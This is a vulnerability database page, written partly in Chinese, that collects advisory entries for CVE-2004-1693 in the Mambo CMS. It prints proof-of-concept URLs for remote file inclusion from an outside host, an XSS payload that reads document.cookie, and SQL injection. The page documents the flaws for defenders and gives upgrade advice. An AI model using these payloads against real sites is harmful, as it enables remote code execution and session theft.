CVE-2004-1693
CVSS7.5
发布时间 :2004-09-18 00:00:00
修订时间 :2016-10-17 22:59:16
NMCOES    

[原文]PHP remote file inclusion vulnerability in Function.php in Mambo 4.5 (1.0.9) allows remote attackers to execute arbitrary PHP code by modifying the mosConfig_absolute_path parameter to reference a URL on a remote web server that contains the code.


[CNNVD]Mambo Server Cache_library远程任意命令执行漏洞(CNNVD-200409-049)

        
        Mambo Open Source是一款开放源代码的WEB内容管理系统。
        Mambo Server存在输入验证错误,远程攻击者可以利用这个漏洞以WEB进程权限执行任意命令或进行跨站脚本攻击。
        Jose Antonio Coret (Joxean Koret)报告在Cache_library中存在一个文件包含错误,允许远程攻击者指定远程的恶意文件作为'mosConfig_absolute_path'参数值,导致目标服务器包含此恶意文件并执行。
        另外'index.php'脚本没有正确对Itemid、mosmsg和limit参数进行检查,构建恶意的URL链接,诱使用户访问,可导致敏感信息泄露,如用户用于验证的COOKIE信息。'Function.php'存在输入验证漏洞,远程攻击者可能利用此漏洞在主机上执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1693
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1693
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200409-049
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109571849713158&w=2
(UNKNOWN)  BUGTRAQ  20040918 Vulnerabilities in TUTOS
http://securitytracker.com/id?1011365
(UNKNOWN)  SECTRACK  1011365
http://www.securityfocus.com/bid/11220
(VENDOR_ADVISORY)  BID  11220
http://xforce.iss.net/xforce/xfdb/17449
(VENDOR_ADVISORY)  XF  mambo-cachelibrary-execute-code(17449)

- 漏洞信息

Mambo Server Cache_library远程任意命令执行漏洞
高危 输入验证
2004-09-18 00:00:00 2006-09-28 00:00:00
远程  
        
        Mambo Open Source是一款开放源代码的WEB内容管理系统。
        Mambo Server存在输入验证错误,远程攻击者可以利用这个漏洞以WEB进程权限执行任意命令或进行跨站脚本攻击。
        Jose Antonio Coret (Joxean Koret)报告在Cache_library中存在一个文件包含错误,允许远程攻击者指定远程的恶意文件作为'mosConfig_absolute_path'参数值,导致目标服务器包含此恶意文件并执行。
        另外'index.php'脚本没有正确对Itemid、mosmsg和limit参数进行检查,构建恶意的URL链接,诱使用户访问,可导致敏感信息泄露,如用户用于验证的COOKIE信息。'Function.php'存在输入验证漏洞,远程攻击者可能利用此漏洞在主机上执行任意命令。
        

- 公告与补丁

        厂商补丁:
        Mambo
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.mamboserver.com/

- 漏洞信息 (24615)

Mambo Open Source 4.5.1 (1.0.9) Function.php Arbitrary Command Execution (EDBID:24615)
php webapps
2004-09-20 Verified
0 Joxean Koret
N/A [点击下载]
source: http://www.securityfocus.com/bid/11220/info
 
Mambo open source is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly validate user-supplied URI parameters.
 
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer, to carry out cross-site scripting attacks, and to make SLQ injection attacks against the vulnerable application.

http://www.example.com/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://www.example.org/		

- 漏洞信息

10180
Mambo Function.php Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Mambo contains a flaw that may allow a remote attacker to execute arbitrary commands. The problem is that the function.php script does not validate the mosConfig_absolute_path variable which can be changed to include and execute code from a remote location. It is possible that the flaw may allow a remote attacker to execute arbitrary commands resulting in a loss of integrity.

- 时间线

2004-09-18 Unknow
2004-09-18 Unknow

- 解决方案

Upgrade to version 4.5.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Mambo Open Source Multiple Input Validation Vulnerabilities
Input Validation Error 11220
Yes No
2004-09-20 12:00:00 2009-07-12 07:06:00
Disclosure of this issue is credited to Joxean Koret <joxeankoret@yahoo.es> and khoai.

- 受影响的程序版本

Mambo Mambo Open Source 4.5.1 (1.0.9)

- 漏洞讨论

Mambo open source is reportedly affected by multiple input validation vulnerabilities. These issues are due to a failure of the application to properly validate user-supplied URI parameters.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer, to carry out cross-site scripting attacks, and to make SLQ injection attacks against the vulnerable application.

- 漏洞利用

No exploits are required to carry out attacks. The following proof of concepts have been provided:

Cross-Site Scripting:
http://www.example.com/index.php?option=com_content&amp;task=view&amp;id=15&amp;Itemid=2&amp;limit=1"&gt;&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&amp;limitstart=1

Remote File Include:
http://www.example.com/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://www.example.org/

SQL injection:
http://www.example.com/index.php?option=com_remository&amp;Itemid=27&amp;func=fileinfo&amp;parent=folder&amp;filecatid=499%20and%201=0[SQL]/*

- 解决方案

It has been reported that the current CVS version has been patched against these issues, although this has not been verified.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站